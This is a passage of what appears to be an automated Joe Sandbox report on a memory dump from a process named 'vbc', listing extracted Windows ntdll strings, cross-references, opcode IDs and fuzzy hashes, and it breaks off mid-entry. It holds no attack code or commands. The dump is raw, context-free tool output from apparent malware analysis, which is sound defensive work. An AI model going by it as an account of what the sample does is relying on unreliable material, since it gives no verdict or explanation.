                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 05848421
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0584855E
                                                      • LdrpInitializeProcess, xrefs: 05848422
                                                      • @, xrefs: 05848591
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 058821D9, 058822B1
                                                      • SXS: %s() passed the empty activation context, xrefs: 058821DE
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 058822B6
                                                      • .Local, xrefs: 058428D8
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0587106B
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05871028
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 058710AE
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05870FE5
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                      Similarity
                                                      • API ID:
                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                      Strings
                                                      • LdrpDynamicShimModule, xrefs: 0587A998
                                                      • apphelp.dll, xrefs: 05832462
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0587A9A2
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0587A992
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $ $0
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      Strings
                                                      • HEAP[%wZ]: , xrefs: 05811712
                                                      • HEAP: , xrefs: 05811596
                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 05811728
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$&$@
                                                      Strings
                                                      • TargetNtPath, xrefs: 058EB82F
                                                      • GlobalizationUserSettings, xrefs: 058EB834
                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 058EB82A
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                      Strings
                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0586E6C6
                                                      • HEAP[%wZ]: , xrefs: 0586E6A6
                                                      • HEAP: , xrefs: 0586E6B3
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                      Strings
                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 0587A589
                                                      • minkernel\ntdll\ldrmap.c, xrefs: 0587A59A
                                                      • LdrpCompleteMapModule, xrefs: 0587A590
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 058882E8
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 058882DE
                                                      • Failed to reallocate the system dirs string !, xrefs: 058882D7
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                      Strings
                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 05881B39
                                                      • LdrpAllocateTls, xrefs: 05881B40
                                                      • minkernel\ntdll\ldrtls.c, xrefs: 05881B4A
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                      Strings
                                                      • PreferredUILanguages, xrefs: 058CC212
                                                      • @, xrefs: 058CC1F1
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 058CC1C5
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      Strings
                                                      • LdrpCheckRedirection, xrefs: 0589488F
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05894888
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 05894899
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      Strings
                                                      • SXS: %s() passed the empty activation context data, xrefs: 058829FE
                                                      • Actx , xrefs: 058433AC
                                                      • RtlCreateActivationContext, xrefs: 058829F9
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                      • API String ID: 0-859632880
                                                      Strings
                                                      • GlobalFlag, xrefs: 0589B68F
                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0589B632
                                                      • @, xrefs: 0589B670
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                      • API String ID: 0-4192008846
                                                      Strings
                                                      • LdrpInitializeTls, xrefs: 05881A47
                                                      • DLL "%wZ" has TLS information at %p, xrefs: 05881A40
                                                      • minkernel\ntdll\ldrtls.c, xrefs: 05881A51
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                      • API String ID: 0-931879808
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 05892104
                                                      • Process initialization failed with status 0x%08lx, xrefs: 058920F3
                                                      • LdrpInitializationFailure, xrefs: 058920FA
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: #%u
                                                      • API String ID: 48624451-232158463
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$
                                                      • API String ID: 0-233714265
                                                      Strings
                                                      • kLsE, xrefs: 05810540
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0581063D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 0-2547482624
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                      • API String ID: 0-118005554
                                                      Strings
                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 05882A95
                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 05882A90
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                      • API String ID: 0-2653619699
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      • API String ID: 2994545307-4008356553
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: verifier.dll
                                                      • API String ID: 0-3265496382
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: kLsE
                                                      • API String ID: 0-3058123920
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Flst
                                                      • API String ID: 0-2374792617
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L4QwL4Qw
                                                      • API String ID: 0-1417497668
                                                      • Opcode ID: 2f2d4918cb210e54759ef2c9a1a467eb51bf30f79de84aecd8c23497c1d50d42
                                                      • Instruction ID: e4809ff71e8d8a3ed5792635f7522c091fa19f8b8160d47fbd60607ea20a5af5
                                                      • Opcode Fuzzy Hash: 2f2d4918cb210e54759ef2c9a1a467eb51bf30f79de84aecd8c23497c1d50d42
                                                      • Instruction Fuzzy Hash: 0721F276A04728AFC3629F18C804B2A7BB5FF84B54F111829ED65DB382DB30EC00CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx
                                                      • API String ID: 0-89312691
                                                      • Opcode ID: ab4e403085b4cb8672d4e88b15f22128e751b7914d813497b79861c3e75023e8
                                                      • Instruction ID: 44cc75d9a646e21ff6bea2a9de53b027215356a5dac879e9f9c25bab4f3445a1
                                                      • Opcode Fuzzy Hash: ab4e403085b4cb8672d4e88b15f22128e751b7914d813497b79861c3e75023e8
                                                      • Instruction Fuzzy Hash: 551196303086068BD725996D8854A76739FFBD5268F35813ADC62CB350E671DC41CF88
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 062b99fe3302076a38ca35ac8d742d054620f309fb9f0aa8dc2dd43ec13d4130
                                                      • Instruction ID: ca74e3e65bcb5d6c14fe14511f0477eb379aaa2f3b11cf1669d8773f5a6a1355
                                                      • Opcode Fuzzy Hash: 062b99fe3302076a38ca35ac8d742d054620f309fb9f0aa8dc2dd43ec13d4130
                                                      • Instruction Fuzzy Hash: 29427B71A0461A8FDB18CF59C494ABEB7B2FF88318B148569D952EB350DB34EC42CBD0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fceae6fd1447756d93720cf92cb59d3e25cf5c3732bacd4c7e7a59c1498ffc9a
                                                      • Instruction ID: 691732e102d8a6b69b8e8a53a8a6067ee76d943b58a4c214b7e6465faf1ef38a
                                                      • Opcode Fuzzy Hash: fceae6fd1447756d93720cf92cb59d3e25cf5c3732bacd4c7e7a59c1498ffc9a
                                                      • Instruction Fuzzy Hash: D322D0702086558BEB28CF29C0947B6B7EABF05304F08845ADC97CB785D7B5ED82CB61
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74e2b98c38fc0b85d8ee950d3ae4c08ac997a45867a105ec67bb3a656be175fe
                                                      • Instruction ID: 44e262c8beec3f8b49183739c9e3cb94918e9e6d3f68a3fd566b4a91a9e31c37
                                                      • Opcode Fuzzy Hash: 74e2b98c38fc0b85d8ee950d3ae4c08ac997a45867a105ec67bb3a656be175fe
                                                      • Instruction Fuzzy Hash: 48228C35B042168BDB19CF59C494ABAF7F2BF88214B24856DDC56DB344EB34AD42CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 426b2ee0a6abc24700700a3fa039c1828e4a5190d305bb00250da80c022c9bfc
                                                      • Instruction ID: 00843607c7e625601cf361a024cd5f5708f65cd4b3ed1d94ca073285f361742c
                                                      • Opcode Fuzzy Hash: 426b2ee0a6abc24700700a3fa039c1828e4a5190d305bb00250da80c022c9bfc
                                                      • Instruction Fuzzy Hash: 8EE16A71608345CFC714CF29C090A6ABBE5BF89318F058A6DEC96CB651EB31ED05CB96
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ae7eeb519d27175d8bdaa3b3eb374af3865368789e258582a9c6d6c4a6f3226d
                                                      • Instruction ID: 49c1f9f52374a7ef11ff2c661a466d80dea97b292c05fe83509f25927d5bdac2
                                                      • Opcode Fuzzy Hash: ae7eeb519d27175d8bdaa3b3eb374af3865368789e258582a9c6d6c4a6f3226d
                                                      • Instruction Fuzzy Hash: 1CD1BE71B0070A9BCB54DF68CC95ABAB3A6BF44218F054629ED56DB2C0EB34ED81CF51
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 95ebb426c32c00ae68775c87c7007a739199abe960f7dc29ab0ba8535dfa8090
                                                      • Instruction ID: b58444f76284cf4ca36ec9c5eb5ecd6268d3bce88f2d74039469f7e6abea7904
                                                      • Opcode Fuzzy Hash: 95ebb426c32c00ae68775c87c7007a739199abe960f7dc29ab0ba8535dfa8090
                                                      • Instruction Fuzzy Hash: E0C1AF71B052199BDF28DF58C841BAAB7BAFF44314F188269DC16EB290D770ED41CB94
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a95c64d6609efb6fd104363703c9af719695147685e8b1a07a6f6d4803b33222
                                                      • Instruction ID: 09599871244a221c0a6993a4848771a85f542b9ea1f726d98cd2e4c3d161722b
                                                      • Opcode Fuzzy Hash: a95c64d6609efb6fd104363703c9af719695147685e8b1a07a6f6d4803b33222
                                                      • Instruction Fuzzy Hash: E0C1EF72A042358BCB24CF18C596B797BB2FF44B14F198159EE42DB3A5EB349D90CB90
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction ID: 3b30b8f0134bee0e1258755739bfd10f1f8f58c914d7ada35ca186dd3fd14055
                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction Fuzzy Hash: 9FB10131704659EFDB21DBA8C858BBEBBB6AF44200F144199DD52EB291DB30ED81CB91
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 078c87484a80a6a017deb30c69b817cf8e02448615eceecee11924e9922dd5a2
                                                      • Instruction ID: ca773e93e5346f64560280d4f3d5fca4fc15af8b25c1c3d5d02da8641b5a57c7
                                                      • Opcode Fuzzy Hash: 078c87484a80a6a017deb30c69b817cf8e02448615eceecee11924e9922dd5a2
                                                      • Instruction Fuzzy Hash: 07A13971A04619AFEB229F68CC85FAE7BB9AF45750F010054FD01EB2A0DBB5DC518BA1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b2acd690a9bfa72ae0c82cfd3725ccbba3e790d1ef85c563aa4ccbf860a93ba
                                                      • Instruction ID: 06156a5a850e03f825a58c9aaefb6a309042c517f2038ebfad3f38abc223d38a
                                                      • Opcode Fuzzy Hash: 7b2acd690a9bfa72ae0c82cfd3725ccbba3e790d1ef85c563aa4ccbf860a93ba
                                                      • Instruction Fuzzy Hash: D3C146712083448FD764CF18C499BAAB7E9FF88304F44496DE98AC7690DB74E948CF92
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9d52bbe668824365940404efe2c2eab5260e309ff225cd6916f48897e333e83
                                                      • Instruction ID: 80c88cedf63b8b7e403ac94af37de1f6e7ba2516a0bf23e7bab85b63b15b0cb4
                                                      • Opcode Fuzzy Hash: f9d52bbe668824365940404efe2c2eab5260e309ff225cd6916f48897e333e83
                                                      • Instruction Fuzzy Hash: ECB15E74B042698BDB64DF58CC94BA9F3B6BF44704F0496E9D80AE7290EB30DD85CB21
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e6d6729f56cbdff91ae572fb4449f23bb68b0ea17d33f097548e432287ab3e40
                                                      • Instruction ID: a33b1ba22dc4cd8457e97caa21039770ff1d49183c57c8b3dcf07fd0f596d3be
                                                      • Opcode Fuzzy Hash: e6d6729f56cbdff91ae572fb4449f23bb68b0ea17d33f097548e432287ab3e40
                                                      • Instruction Fuzzy Hash: B4A10371E0462C9FEF21DB99C849FAEBBA9BB40754F050121EE11EB290DB789D40CBD1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
